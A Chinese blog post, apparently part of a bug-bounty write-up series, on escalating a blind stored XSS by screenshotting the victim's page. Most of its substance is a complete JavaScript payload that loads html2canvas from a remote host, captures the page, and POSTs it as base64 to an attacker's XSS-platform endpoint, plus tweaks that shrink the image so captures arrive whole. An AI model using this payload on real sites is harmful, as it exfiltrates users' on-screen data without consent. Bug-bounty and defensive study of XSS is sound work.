12. xss bypass xss截屏
layout: post
title: 12. xss bypass
category: SRC
tags: SRC
keywords: SRC,XSS
前言
该篇记录为记录实际的src过程第12篇小文章,内容为某网站的xssbypass。
盲打存储xss
一般的存储xss,会遇到两种情况:
- 可以公网访问,则视后台的敏感程度定危害,一般可到高危。
- 不可以公网访问,打到cookie,如果没有证明危害,一般会给中危。
- 可蠕虫的用户xss,高危
- 不可蠕虫的普通的用户级别存储xss,中危
提升危害的方法
对于第二种情况,能想到的提升危害的方法就是xss截图。
document.write("<script src=\"https:\/\/xxxxx\/html2canvas.js\"><\/script>");window.onload = function () {html2canvas(document.body, {onrendered: function (canvas) {//下面开始把抓取到的屏幕图片代码传输和接收,由于代码非常的长,只能使用postxhr = function () {var request = false;if (window.XMLHttpRequest) {request = new XMLHttpRequest();} else if (window.ActiveXObject) {try {request = new window.ActiveXObject('Microsoft.XMLHTTP');} catch (e) {}}return request;}();request = function (method, src, argv, content_type) {xhr.open(method, src, false);if (method == 'POST') xhr.setRequestHeader('Content-type', content_type);xhr.send(argv); //发送POST数据return xhr.responseText;};attack_a = function () {var src = "https://xxxx/xss.php?do=api&id={projectId}"; //post接收地址var argv_0 = "'&screenshot=" + canvas.toDataURL(); //post字段名称为screenshotrequest("POST", src, argv_0, "application/x-www-form-urlencoded");};attack_a();}});
}
但是这种平台遇到的问题就是,有时候图片数据过大,转为base64传过来的时候会少数据。
这个时候就可以减少像素传输的方式将完整的图片传过来。
解决办法
var fullQuality = canvas.toDataURL("image/jpeg", 1.0);
// data:image/jpeg;base64,/9j/4AAQSkZJRgABAQ...9oADAMBAAIRAxEAPwD/AD/6AP/Z"
var mediumQuality = canvas.toDataURL("image/jpeg", 0.5);
var lowQuality = canvas.toDataURL("image/jpeg", 0.1);
最后的效果看,还是能够清楚的看到用户的数据的。
后话
xxxxx
12. xss bypass xss截屏相关推荐
- Xss Bypass备忘录
技术要发展,免不了风波. 也许这些攻攻防防会更好的促进技术的发展也说不定 就让这一次次的爆破换来将来更精练的技术的无比的宁静吧 我们静观其变吧! 缅怀当初那份最纯真Hacker精神!! 2017.深圳 ...
- 03系统多界面_资讯:苹果公布iPhone 12屏幕更换价格;华为 Mate 40 Pro 系统界面截屏曝光;Redmi K30S 更多细节曝光...
黑马公社为你报时,今天是2020年10月19日,周一. 黑马资讯如约而至. 苹果公布 iPhone 12/12 Pro 屏幕更换价格:2149 元 苹果 10 月 14 日正式发布了 iPhone 1 ...
- Bypass上传与Bypass XSS
Bypass,通俗理解就是绕过的意思,绕过WAF 文章目录 一.Bypass上传 二.Bypass XSS 一.Bypass上传 (1)加分号 抓包,在文件名后加分号,也可在文件名中间加 file ...
- 12.3、Libgdx的图像之截屏
(官网:www.libgdx.cn) 接下来的示例说明怎样进行截屏并且保存为PNG格式. public class ScreenshotFactory { private static int cou ...
- 靶机12 PENTESTER LAB: XSS AND MYSQL FILE
简介:本练习说明如何使用跨站点脚本漏洞来访问管理员的 Cookie.然后,如何使用他/她的会话来访问管理以查找SQL注入并使用它获得代码执行. 你会学到什么? 跨站点脚本攻击 具有文件权限的 MySQ ...
- 苹果截屏快捷键_苹果12将在10月上市,介绍下苹果手机便捷的实用技巧,
工作时我们都会用到电脑,电脑上有许多快捷键,一下子可能记不住,天天使用的话就会非常熟悉了.有了这些快捷键,工作时间就缩减一半啦.然而当我们在使用手机时,我们也会挖掘它的快捷键,苹果手机上有哪些快捷键呢 ...
- 对相机所看的视角截屏保存为图片
对相机所看的视角截屏保存为图片: 1 using UnityEngine; 2 using System.Collections; 3 using UnityEngine.UI; 4 /// < ...
- 如何以编程方式在Android上截屏?
如何通过代码而不是通过任何程序来截屏电话屏幕的选定区域? #1楼 Mualig的回答很好,但是我遇到了Ewoks描述的相同问题,但我没有得到背景知识. 因此,有时足够好,有时我会在黑色背景上出现黑色文 ...
- Android截屏方法总结
最近研究了一些Android的截屏方法,做一个总结. 图片剪裁方法 使用View.getDrawingCache()得到Bitmap.非常简单但是只能截图本应用的图片,并且没办法控制截图的范围. 对B ...
最新文章
- 不追逐标准化产品,360数科的一站式风控体系有何不同?
- 皮一皮:这是结婚还是华山论剑...
- 输出10000内所有素数
- ++和--操作符分析
- 每日两SQL(10),欢迎交流~
- Java中Comparator比较器的使用以及使用lamba简化代码
- mysql使用技巧,使用Mysql的小技巧总结
- core控制器属性注入的用处_asp.net-core – 如何使用Autofac和ASP.NET Core在控制器上启用属性注入?...
- Python实现给定两点经纬度数据求解两点平面直线距离与方位角
- mysql将数据拟合曲线_有关任意多条曲线的拟合度算法
- 大学计算机vb基础知识6,西华师范大学计算机VB试题及答案6
- 供应链金融运营研究 -----内容运营
- android实现日历
- CRISPR-Cas9实验常见问题及解决方案
- 使用Hystrix实现自动降级与依赖隔离
- 轻松搭建影音服务器(转)
- 河北大学计算机科学与技术专业硬件实训——C语言控制51单片机实现LED小灯的控制
- C语言 格式转换字符
- 远场距离除了10λ和2D^2/λ还有别的吗?
- 2019的一些记录,共勉